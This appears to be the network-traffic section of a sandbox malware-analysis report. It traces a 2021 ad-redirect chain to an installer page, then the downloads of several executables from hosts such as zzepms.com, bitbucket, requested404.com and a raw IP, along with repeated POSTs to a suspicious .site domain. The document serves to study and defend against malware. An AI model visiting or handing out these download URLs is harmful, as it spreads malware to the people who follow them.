                                                                                          Content-Type: application/ocsp-response
                                                                                          Content-Length: 1514
                                                                                          Connection: keep-alive
                                                                                          Keep-Alive: timeout=5
                                                                                          X-Cached: HIT
                                                                                          Cache-Control: max-age=865
                                                                                        • DNS
                                                                                          jeehathu.com
                                                                                          Request
                                                                                          jeehathu.com
                                                                                          IN A
                                                                                          Response
                                                                                          jeehathu.com
                                                                                          IN A
                                                                                          139.45.197.239
                                                                                        • GET
                                                                                          https://jeehathu.com/4/4311621/?var=1294231
                                                                                          Request
                                                                                          GET /4/4311621/?var=1294231 HTTP/2.0
                                                                                          host: jeehathu.com
                                                                                          accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                          referer: https://myactualblog.com/?s=437507092824204040&ssk=4e08a72f5dc9783aca72b61635530df2&svar=1625873340&z=1294231&pz=2660706&tb=4311621&l=2RIeE0GOb7s2Sio
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          server: nginx
                                                                                          date: Fri, 09 Jul 2021 23:28:57 GMT
                                                                                          content-type: text/html; charset=utf8
                                                                                          x-trace-id: cb184e6a5f6d4b3353ccaeebd3ec01e5
                                                                                          link: <https://propeller-tracking.com>; rel="preconnect dns-prefetch",<https://my.rtmark.net>; rel="preconnect dns-prefetch"
                                                                                          link: <https://dist.propapps.info>; rel="preconnect dns-prefetch",<https://propeller-tracking.com>; rel="preconnect dns-prefetch"
                                                                                          access-control-allow-origin: *
                                                                                          access-control-allow-credentials: true
                                                                                          access-control-allow-methods: GET, POST, OPTIONS
                                                                                          access-control-allow-headers: Accept, Content-Type, Content-Length, Accept-Encoding
                                                                                          pragma: no-cache
                                                                                          cache-control: no-transform, no-store, no-cache, must-revalidate, max-age=0
                                                                                          expires: Tue, 11 Jan 1994 10:00:00 GMT
                                                                                          timing-allow-origin: *
                                                                                          set-cookie: OAID=1d8bfbc63e5c4ffb8c9d64deb7ba5fb9; expires=Sat, 09 Jul 2022 23:29:03 GMT; path=/; secure; SameSite=None
                                                                                          set-cookie: oaidts=1625873343; expires=Sat, 09 Jul 2022 23:29:03 GMT; path=/; secure; SameSite=None
                                                                                          set-cookie: syncedCookie=; expires=Tue, 10 Nov 2009 23:00:00 GMT
                                                                                          pragma: no-cache
                                                                                          cache-control: no-store, no-cache, must-revalidate, max-age=0
                                                                                          expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                          access-control-allow-origin: *
                                                                                          access-control-allow-methods: POST, GET, OPTIONS, PUT, DELETE
                                                                                          access-control-allow-headers: Accept, Content-Type, Content-Length, Accept-Encoding
                                                                                          content-encoding: gzip
                                                                                        • DNS
                                                                                          dist.propapps.info
                                                                                          Request
                                                                                          dist.propapps.info
                                                                                          IN A
                                                                                          Response
                                                                                          dist.propapps.info
                                                                                          IN CNAME
                                                                                          molecular-suchomimus-xkomlgm1n1kb803m6m4kf3hv.herokudns.com
                                                                                          molecular-suchomimus-xkomlgm1n1kb803m6m4kf3hv.herokudns.com
                                                                                          IN A
                                                                                          52.20.78.240
                                                                                          molecular-suchomimus-xkomlgm1n1kb803m6m4kf3hv.herokudns.com
                                                                                          IN A
                                                                                          54.91.59.199
                                                                                          molecular-suchomimus-xkomlgm1n1kb803m6m4kf3hv.herokudns.com
                                                                                          IN A
                                                                                          3.232.242.170
                                                                                          molecular-suchomimus-xkomlgm1n1kb803m6m4kf3hv.herokudns.com
                                                                                          IN A
                                                                                          3.220.57.224
                                                                                        • GET
                                                                                          https://jeehathu.com/favicon.ico
                                                                                          Request
                                                                                          GET /favicon.ico HTTP/2.0
                                                                                          host: jeehathu.com
                                                                                          accept: */*
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          dnt: 1
                                                                                          Response
                                                                                          HTTP/2.0 204
                                                                                          server: nginx
                                                                                          date: Fri, 09 Jul 2021 23:28:58 GMT
                                                                                          expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                                                          cache-control: max-age=315360000
                                                                                          pragma: public
                                                                                          cache-control: public, must-revalidate, proxy-revalidate
                                                                                        • GET
                                                                                          https://dist.propapps.info/?c=painst&subid=437507109454622804&cid=4311621
                                                                                          Request
                                                                                          GET /?c=painst&subid=437507109454622804&cid=4311621 HTTP/1.1
                                                                                          Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                          Accept-Language: en-US
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Host: dist.propapps.info
                                                                                          Connection: Keep-Alive
                                                                                          Response
                                                                                          HTTP/1.1 302 Found
                                                                                          Server: Cowboy
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: Express
                                                                                          Location: https://www.propapps.info?c=painst&subid=437507109454622804&cid=4311621
                                                                                          Vary: Accept
                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                          Content-Length: 93
                                                                                          Date: Fri, 09 Jul 2021 23:29:03 GMT
                                                                                          Via: 1.1 vegur
                                                                                        • DNS
                                                                                          www.propapps.info
                                                                                          Request
                                                                                          www.propapps.info
                                                                                          IN A
                                                                                          Response
                                                                                          www.propapps.info
                                                                                          IN CNAME
                                                                                          deep-wisteria-g7u6bcxr6vhvq109ky2cj4v8.herokudns.com
                                                                                          deep-wisteria-g7u6bcxr6vhvq109ky2cj4v8.herokudns.com
                                                                                          IN A
                                                                                          52.20.78.240
                                                                                          deep-wisteria-g7u6bcxr6vhvq109ky2cj4v8.herokudns.com
                                                                                          IN A
                                                                                          54.91.59.199
                                                                                          deep-wisteria-g7u6bcxr6vhvq109ky2cj4v8.herokudns.com
                                                                                          IN A
                                                                                          3.232.242.170
                                                                                          deep-wisteria-g7u6bcxr6vhvq109ky2cj4v8.herokudns.com
                                                                                          IN A
                                                                                          3.220.57.224
                                                                                        • GET
                                                                                          https://www.propapps.info/?c=painst&subid=437507109454622804&cid=4311621
                                                                                          Request
                                                                                          GET /?c=painst&subid=437507109454622804&cid=4311621 HTTP/1.1
                                                                                          Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                          Accept-Language: en-US
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Host: www.propapps.info
                                                                                          Connection: Keep-Alive
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Server: Cowboy
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: Express
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Content-Length: 31284
                                                                                          Etag: "219028420"
                                                                                          Date: Fri, 09 Jul 2021 23:29:04 GMT
                                                                                          Via: 1.1 vegur
                                                                                        • GET
                                                                                          https://www.propapps.info/layouts/box/box.css
                                                                                          Request
                                                                                          GET /layouts/box/box.css HTTP/1.1
                                                                                          Accept: text/css, */*
                                                                                          Referer: https://www.propapps.info/?c=painst&subid=437507109454622804&cid=4311621
                                                                                          Accept-Language: en-US
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Host: www.propapps.info
                                                                                          Connection: Keep-Alive
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Server: Cowboy
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: Express
                                                                                          Accept-Ranges: bytes
                                                                                          Etag: "10747-1625474775000"
                                                                                          Date: Fri, 09 Jul 2021 23:29:04 GMT
                                                                                          Cache-Control: public, max-age=0
                                                                                          Last-Modified: Mon, 05 Jul 2021 08:46:15 GMT
                                                                                          Content-Type: text/css; charset=UTF-8
                                                                                          Vary: Accept-Encoding
                                                                                          Content-Encoding: gzip
                                                                                          Transfer-Encoding: chunked
                                                                                          Via: 1.1 vegur
                                                                                        • GET
                                                                                          https://www.propapps.info/config.min.js
                                                                                          Request
                                                                                          GET /config.min.js HTTP/1.1
                                                                                          Accept: application/javascript, */*;q=0.8
                                                                                          Referer: https://www.propapps.info/?c=painst&subid=437507109454622804&cid=4311621
                                                                                          Accept-Language: en-US
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Host: www.propapps.info
                                                                                          Connection: Keep-Alive
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Server: Cowboy
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: Express
                                                                                          Accept-Ranges: bytes
                                                                                          Etag: "1060-1625474775000"
                                                                                          Date: Fri, 09 Jul 2021 23:29:04 GMT
                                                                                          Cache-Control: public, max-age=0
                                                                                          Last-Modified: Mon, 05 Jul 2021 08:46:15 GMT
                                                                                          Content-Type: application/javascript
                                                                                          Vary: Accept-Encoding
                                                                                          Content-Encoding: gzip
                                                                                          Transfer-Encoding: chunked
                                                                                          Via: 1.1 vegur
                                                                                        • GET
                                                                                          https://www.propapps.info/js/global.min.js
                                                                                          Request
                                                                                          GET /js/global.min.js HTTP/1.1
                                                                                          Accept: application/javascript, */*;q=0.8
                                                                                          Referer: https://www.propapps.info/?c=painst&subid=437507109454622804&cid=4311621
                                                                                          Accept-Language: en-US
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Host: www.propapps.info
                                                                                          Connection: Keep-Alive
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Server: Cowboy
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: Express
                                                                                          Accept-Ranges: bytes
                                                                                          Etag: "2171-1625474775000"
                                                                                          Date: Fri, 09 Jul 2021 23:29:04 GMT
                                                                                          Cache-Control: public, max-age=0
                                                                                          Last-Modified: Mon, 05 Jul 2021 08:46:15 GMT
                                                                                          Content-Type: application/javascript
                                                                                          Vary: Accept-Encoding
                                                                                          Content-Encoding: gzip
                                                                                          Transfer-Encoding: chunked
                                                                                          Via: 1.1 vegur
                                                                                        • GET
                                                                                          https://www.propapps.info/images/install-step1-chrome.png
                                                                                          Request
                                                                                          GET /images/install-step1-chrome.png HTTP/1.1
                                                                                          Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                          Referer: https://www.propapps.info/?c=painst&subid=437507109454622804&cid=4311621
                                                                                          Accept-Language: en-US
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Host: www.propapps.info
                                                                                          Connection: Keep-Alive
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Server: Cowboy
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: Express
                                                                                          Accept-Ranges: bytes
                                                                                          Etag: "23056-1625474775000"
                                                                                          Date: Fri, 09 Jul 2021 23:29:04 GMT
                                                                                          Cache-Control: public, max-age=0
                                                                                          Last-Modified: Mon, 05 Jul 2021 08:46:15 GMT
                                                                                          Content-Type: image/png
                                                                                          Content-Length: 23056
                                                                                          Via: 1.1 vegur
                                                                                        • GET
                                                                                          https://www.propapps.info/images/install-step3.png
                                                                                          Request
                                                                                          GET /images/install-step3.png HTTP/1.1
                                                                                          Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                          Referer: https://www.propapps.info/?c=painst&subid=437507109454622804&cid=4311621
                                                                                          Accept-Language: en-US
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Host: www.propapps.info
                                                                                          Connection: Keep-Alive
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Server: Cowboy
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: Express
                                                                                          Accept-Ranges: bytes
                                                                                          Etag: "14921-1625474775000"
                                                                                          Date: Fri, 09 Jul 2021 23:29:04 GMT
                                                                                          Cache-Control: public, max-age=0
                                                                                          Last-Modified: Mon, 05 Jul 2021 08:46:15 GMT
                                                                                          Content-Type: image/png
                                                                                          Content-Length: 14921
                                                                                          Via: 1.1 vegur
                                                                                        • GET
                                                                                          https://www.propapps.info/lang/box/BookLot
                                                                                          Request
                                                                                          GET /lang/box/BookLot HTTP/1.1
                                                                                          Accept: */*
                                                                                          Referer: https://www.propapps.info/?c=painst&subid=437507109454622804&cid=4311621
                                                                                          Accept-Language: en-US
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Host: www.propapps.info
                                                                                          Connection: Keep-Alive
                                                                                          Cookie: _ga=GA1.2.2056017352.1625880327; _gid=GA1.2.965274542.1625880327; _gat=1; vid=107cba7f-37f8-75c9-9071-d07d0ac0294b
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Server: Cowboy
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: Express
                                                                                          Content-Type: application/json
                                                                                          Content-Length: 4493
                                                                                          Etag: "229326733"
                                                                                          Date: Fri, 09 Jul 2021 23:29:05 GMT
                                                                                          Via: 1.1 vegur
                                                                                        • GET
                                                                                          https://www.propapps.info/images/install-step2.png
                                                                                          Request
                                                                                          GET /images/install-step2.png HTTP/1.1
                                                                                          Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                          Referer: https://www.propapps.info/?c=painst&subid=437507109454622804&cid=4311621
                                                                                          Accept-Language: en-US
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Host: www.propapps.info
                                                                                          Connection: Keep-Alive
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Server: Cowboy
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: Express
                                                                                          Accept-Ranges: bytes
                                                                                          Etag: "20738-1625474775000"
                                                                                          Date: Fri, 09 Jul 2021 23:29:04 GMT
                                                                                          Cache-Control: public, max-age=0
                                                                                          Last-Modified: Mon, 05 Jul 2021 08:46:15 GMT
                                                                                          Content-Type: image/png
                                                                                          Content-Length: 20738
                                                                                          Via: 1.1 vegur
                                                                                        • GET
                                                                                          https://www.propapps.info/resources/Wiki/links.json
                                                                                          Request
                                                                                          GET /resources/Wiki/links.json HTTP/1.1
                                                                                          Accept: */*
                                                                                          Referer: https://www.propapps.info/?c=painst&subid=437507109454622804&cid=4311621
                                                                                          Accept-Language: en-US
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Host: www.propapps.info
                                                                                          Connection: Keep-Alive
                                                                                          Cookie: _ga=GA1.2.2056017352.1625880327; _gid=GA1.2.965274542.1625880327; _gat=1; vid=107cba7f-37f8-75c9-9071-d07d0ac0294b
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Server: Cowboy
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: Express
                                                                                          Accept-Ranges: bytes
                                                                                          Etag: "389-1625474775000"
                                                                                          Date: Fri, 09 Jul 2021 23:29:05 GMT
                                                                                          Cache-Control: public, max-age=0
                                                                                          Last-Modified: Mon, 05 Jul 2021 08:46:15 GMT
                                                                                          Content-Type: application/json
                                                                                          Content-Length: 389
                                                                                          Vary: Accept-Encoding
                                                                                          Via: 1.1 vegur
                                                                                        • GET
                                                                                          https://www.propapps.info/resources/Wiki/background.png
                                                                                          Request
                                                                                          GET /resources/Wiki/background.png HTTP/1.1
                                                                                          Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                          Referer: https://www.propapps.info/?c=painst&subid=437507109454622804&cid=4311621
                                                                                          Accept-Language: en-US
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Host: www.propapps.info
                                                                                          Connection: Keep-Alive
                                                                                          Cookie: _ga=GA1.2.2056017352.1625880327; _gid=GA1.2.965274542.1625880327; _gat=1; vid=107cba7f-37f8-75c9-9071-d07d0ac0294b
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Server: Cowboy
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: Express
                                                                                          Accept-Ranges: bytes
                                                                                          Etag: "65781-1625474775000"
                                                                                          Date: Fri, 09 Jul 2021 23:29:05 GMT
                                                                                          Cache-Control: public, max-age=0
                                                                                          Last-Modified: Mon, 05 Jul 2021 08:46:15 GMT
                                                                                          Content-Type: image/png
                                                                                          Content-Length: 65781
                                                                                          Via: 1.1 vegur
                                                                                        • GET
                                                                                          https://www.propapps.info/resources/Wiki/logo.png
                                                                                          Request
                                                                                          GET /resources/Wiki/logo.png HTTP/1.1
                                                                                          Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                          Referer: https://www.propapps.info/?c=painst&subid=437507109454622804&cid=4311621
                                                                                          Accept-Language: en-US
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Host: www.propapps.info
                                                                                          Connection: Keep-Alive
                                                                                          Cookie: _ga=GA1.2.2056017352.1625880327; _gid=GA1.2.965274542.1625880327; _gat=1; vid=107cba7f-37f8-75c9-9071-d07d0ac0294b
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Server: Cowboy
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: Express
                                                                                          Accept-Ranges: bytes
                                                                                          Etag: "9614-1625474775000"
                                                                                          Date: Fri, 09 Jul 2021 23:29:05 GMT
                                                                                          Cache-Control: public, max-age=0
                                                                                          Last-Modified: Mon, 05 Jul 2021 08:46:15 GMT
                                                                                          Content-Type: image/png
                                                                                          Content-Length: 9614
                                                                                          Via: 1.1 vegur
                                                                                        • DNS
                                                                                          www.propapps.info
                                                                                          Request
                                                                                          www.propapps.info
                                                                                          IN A
                                                                                          Response
                                                                                          www.propapps.info
                                                                                          IN CNAME
                                                                                          deep-wisteria-g7u6bcxr6vhvq109ky2cj4v8.herokudns.com
                                                                                          deep-wisteria-g7u6bcxr6vhvq109ky2cj4v8.herokudns.com
                                                                                          IN A
                                                                                          52.20.78.240
                                                                                          deep-wisteria-g7u6bcxr6vhvq109ky2cj4v8.herokudns.com
                                                                                          IN A
                                                                                          54.91.59.199
                                                                                          deep-wisteria-g7u6bcxr6vhvq109ky2cj4v8.herokudns.com
                                                                                          IN A
                                                                                          3.232.242.170
                                                                                          deep-wisteria-g7u6bcxr6vhvq109ky2cj4v8.herokudns.com
                                                                                          IN A
                                                                                          3.220.57.224
                                                                                        • GET
                                                                                          https://www.propapps.info/resources/Wiki/favicon.ico
                                                                                          Request
                                                                                          GET /resources/Wiki/favicon.ico HTTP/1.1
                                                                                          Accept: */*
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          Host: www.propapps.info
                                                                                          DNT: 1
                                                                                          Connection: Keep-Alive
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Server: Cowboy
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: Express
                                                                                          Accept-Ranges: bytes
                                                                                          Etag: "370070-1625474775000"
                                                                                          Date: Fri, 09 Jul 2021 23:29:05 GMT
                                                                                          Cache-Control: public, max-age=0
                                                                                          Last-Modified: Mon, 05 Jul 2021 08:46:15 GMT
                                                                                          Content-Type: image/x-icon
                                                                                          Vary: Accept-Encoding
                                                                                          Content-Encoding: gzip
                                                                                          Transfer-Encoding: chunked
                                                                                          Via: 1.1 vegur
                                                                                        • GET
                                                                                          https://www.propapps.info/favicon.ico
                                                                                          Request
                                                                                          GET /favicon.ico HTTP/1.1
                                                                                          Accept: */*
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          Host: www.propapps.info
                                                                                          DNT: 1
                                                                                          Connection: Keep-Alive
                                                                                          Response
                                                                                          HTTP/1.1 404 Not Found
                                                                                          Server: Cowboy
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: Express
                                                                                          Content-Type: text/html
                                                                                          Vary: Accept-Encoding
                                                                                          Date: Fri, 09 Jul 2021 23:29:05 GMT
                                                                                          Transfer-Encoding: chunked
                                                                                          Via: 1.1 vegur
                                                                                        • DNS
                                                                                          tttttt.me
                                                                                          Request
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          Response
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          54.197.173.238
                                                                                        • DNS
                                                                                          i.instagram.com
                                                                                          Request
                                                                                          i.instagram.com
                                                                                          IN A
                                                                                          Response
                                                                                          i.instagram.com
                                                                                          IN CNAME
                                                                                          instagram.c10r.facebook.com
                                                                                          instagram.c10r.facebook.com
                                                                                          IN A
                                                                                          31.13.83.52
                                                                                        • DNS
                                                                                          www.instagram.com
                                                                                          Request
                                                                                          www.instagram.com
                                                                                          IN A
                                                                                          Response
                                                                                          www.instagram.com
                                                                                          IN CNAME
                                                                                          z-p42-instagram.c10r.facebook.com
                                                                                          z-p42-instagram.c10r.facebook.com
                                                                                          IN A
                                                                                          31.13.83.174
                                                                                        • DNS
                                                                                          i.instagram.com
                                                                                          Request
                                                                                          i.instagram.com
                                                                                          IN A
                                                                                          Response
                                                                                          i.instagram.com
                                                                                          IN CNAME
                                                                                          instagram.c10r.facebook.com
                                                                                          instagram.c10r.facebook.com
                                                                                          IN A
                                                                                          31.13.72.53
                                                                                        • 82.118.23.111:80
                                                                                          http://999080321newfolder1002-01462599908032135.site/
                                                                                          http
                                                                                          54.5kB
                                                                                          2.8MB
                                                                                          978
                                                                                          1886

                                                                                          HTTP Request

                                                                                          POST http://999080321newfolder1002-01462599908032135.site/

                                                                                          HTTP Response

                                                                                          404

                                                                                          HTTP Request

                                                                                          POST http://999080321newfolder1002-01462599908032135.site/

                                                                                          HTTP Response

                                                                                          404

                                                                                          HTTP Request

                                                                                          POST http://999080321newfolder1002-01462599908032135.site/

                                                                                          HTTP Response

                                                                                          404

                                                                                          HTTP Request

                                                                                          POST http://999080321newfolder1002-01462599908032135.site/

                                                                                          HTTP Response

                                                                                          404

                                                                                          HTTP Request

                                                                                          POST http://999080321newfolder1002-01462599908032135.site/

                                                                                          HTTP Response

                                                                                          404

                                                                                          HTTP Request

                                                                                          POST http://999080321newfolder1002-01462599908032135.site/

                                                                                          HTTP Response

                                                                                          404

                                                                                          HTTP Request

                                                                                          POST http://999080321newfolder1002-01462599908032135.site/


                                                                                          200
                                                                                        • 103.155.92.96:80
                                                                                          http://www.zzepms.com/askinstall51.exe
                                                                                          http
                                                                                          24.3kB
                                                                                          1.5MB
                                                                                          521
                                                                                          1024

                                                                                          HTTP Request

                                                                                          GET http://www.zzepms.com/askhelp51/askinstall51.exe

                                                                                          HTTP Response

                                                                                          302

                                                                                          HTTP Request

                                                                                          GET http://www.zzepms.com/askinstall51.exe

                                                                                          HTTP Response

                                                                                          200
                                                                                        • 104.192.141.1:443
                                                                                          https://bitbucket.org/globallinstall/globalinstall/downloads/JointerPokerish_2021-07-07_19-21.exe
                                                                                          tls, http
                                                                                          961 B
                                                                                          6.7kB
                                                                                          9
                                                                                          11

                                                                                          HTTP Request

                                                                                          GET https://bitbucket.org/globallinstall/globalinstall/downloads/JointerPokerish_2021-07-07_19-21.exe

                                                                                          HTTP Response

                                                                                          302
                                                                                        • 144.202.76.47:443
                                                                                          https://www.listincode.com/
                                                                                          tls, http
                                                                                          15D6.exe
                                                                                          991 B
                                                                                          4.0kB
                                                                                          11
                                                                                          8

                                                                                          HTTP Request

                                                                                          GET https://www.listincode.com/

                                                                                          HTTP Response

                                                                                          200
                                                                                        • 52.216.138.243:443
                                                                                          https://bbuseruploads.s3.amazonaws.com/fcb752ab-3dce-4502-8a1b-14cba7bf8f58/downloads/d55fad87-82f4-4d5f-84e7-0702720ae82c/JointerPokerish_2021-07-07_19-21.exe?Signature=ScekDx3P3S1hUHtluyA3eCAciZM%3D&Expires=1625873509&AWSAccessKeyId=AKIA6KOSE3BNJRRFUUX6&versionId=I6n8o2QcK1qU_ovIhM6Me7Hh2rXSqv_z&response-content-disposition=attachment%3B%20filename%3D%22JointerPokerish_2021-07-07_19-21.exe%22
                                                                                          tls, http
                                                                                          7.5kB
                                                                                          376.9kB
                                                                                          144
                                                                                          272

                                                                                          HTTP Request

                                                                                          GET https://bbuseruploads.s3.amazonaws.com/fcb752ab-3dce-4502-8a1b-14cba7bf8f58/downloads/d55fad87-82f4-4d5f-84e7-0702720ae82c/JointerPokerish_2021-07-07_19-21.exe?Signature=ScekDx3P3S1hUHtluyA3eCAciZM%3D&Expires=1625873509&AWSAccessKeyId=AKIA6KOSE3BNJRRFUUX6&versionId=I6n8o2QcK1qU_ovIhM6Me7Hh2rXSqv_z&response-content-disposition=attachment%3B%20filename%3D%22JointerPokerish_2021-07-07_19-21.exe%22

                                                                                          HTTP Response

                                                                                          200
                                                                                        • 93.157.63.171:80
                                                                                          http://93.157.63.171/filename.exe
                                                                                          http
                                                                                          9.5kB
                                                                                          567.0kB
                                                                                          202
                                                                                          383

                                                                                          HTTP Request

                                                                                          GET http://93.157.63.171/filename.exe

                                                                                          HTTP Response

                                                                                          200
                                                                                        • 162.0.210.44:443
                                                                                          https://connectini.net/Series/SuperNitou.php
                                                                                          tls, http
                                                                                          1075474_ah_hot_iconçè_)))_.exe
                                                                                          1.1kB
                                                                                          5.0kB
                                                                                          11
                                                                                          9

                                                                                          HTTP Request

                                                                                          POST https://connectini.net/Series/SuperNitou.php

                                                                                          HTTP Response

                                                                                          200
                                                                                        • 72.21.91.29:80
                                                                                          http://statuse.digitalcertvalidation.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRJrF0xYA49jC3D83fgDGesaUkzIQQUf9OZ86BHDjEAVlYijrfMnt3KAYoCEAYJR5FkG19ljPHMaGsuvmc%3D
                                                                                          http
                                                                                          15D6.exe
                                                                                          478 B
                                                                                          931 B
                                                                                          5
                                                                                          3

                                                                                          HTTP Request

                                                                                          GET http://statuse.digitalcertvalidation.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRJrF0xYA49jC3D83fgDGesaUkzIQQUf9OZ86BHDjEAVlYijrfMnt3KAYoCEAYJR5FkG19ljPHMaGsuvmc%3D

                                                                                          HTTP Response

                                                                                          200
                                                                                        • 88.99.66.31:443
                                                                                          https://iplogger.org/1Cr3a7
                                                                                          tls, http
                                                                                          15D6.exe
                                                                                          1.1kB
                                                                                          6.2kB
                                                                                          12
                                                                                          8

                                                                                          HTTP Request

                                                                                          GET https://iplogger.org/1Cr3a7

                                                                                          HTTP Response

                                                                                          200
                                                                                        • 63.250.33.126:80
                                                                                          http://requested404.com/products/Hand/3b7m4byc3rpeb3wu.exe
                                                                                          http
                                                                                          1075474_ah_hot_iconçè_)))_.exe
                                                                                          144.1kB
                                                                                          7.5MB
                                                                                          2925
                                                                                          5045

                                                                                          HTTP Request

                                                                                          GET http://requested404.com/Widgets/i-record.exe

                                                                                          HTTP Response

                                                                                          200

                                                                                          HTTP Request

                                                                                          GET http://requested404.com/products/bita3elcpm/esskm3392gysubeu.exe

                                                                                          HTTP Response

                                                                                          200

                                                                                          HTTP Request

                                                                                          GET http://requested404.com/products/Sabbeb/a3er3tvh9s2hkm7n.exe

                                                                                          HTTP Response

                                                                                          200

                                                                                          HTTP Request

                                                                                          GET http://requested404.com/products/Hand/3b7m4byc3rpeb3wu.exe

                                                                                          HTTP Response

                                                                                          200
                                                                                        • 54.197.173.238:443
                                                                                          tttttt.me
                                                                                          tls
                                                                                          759F.exe
                                                                                          358 B
                                                                                          80 B
                                                                                          4
                                                                                          2
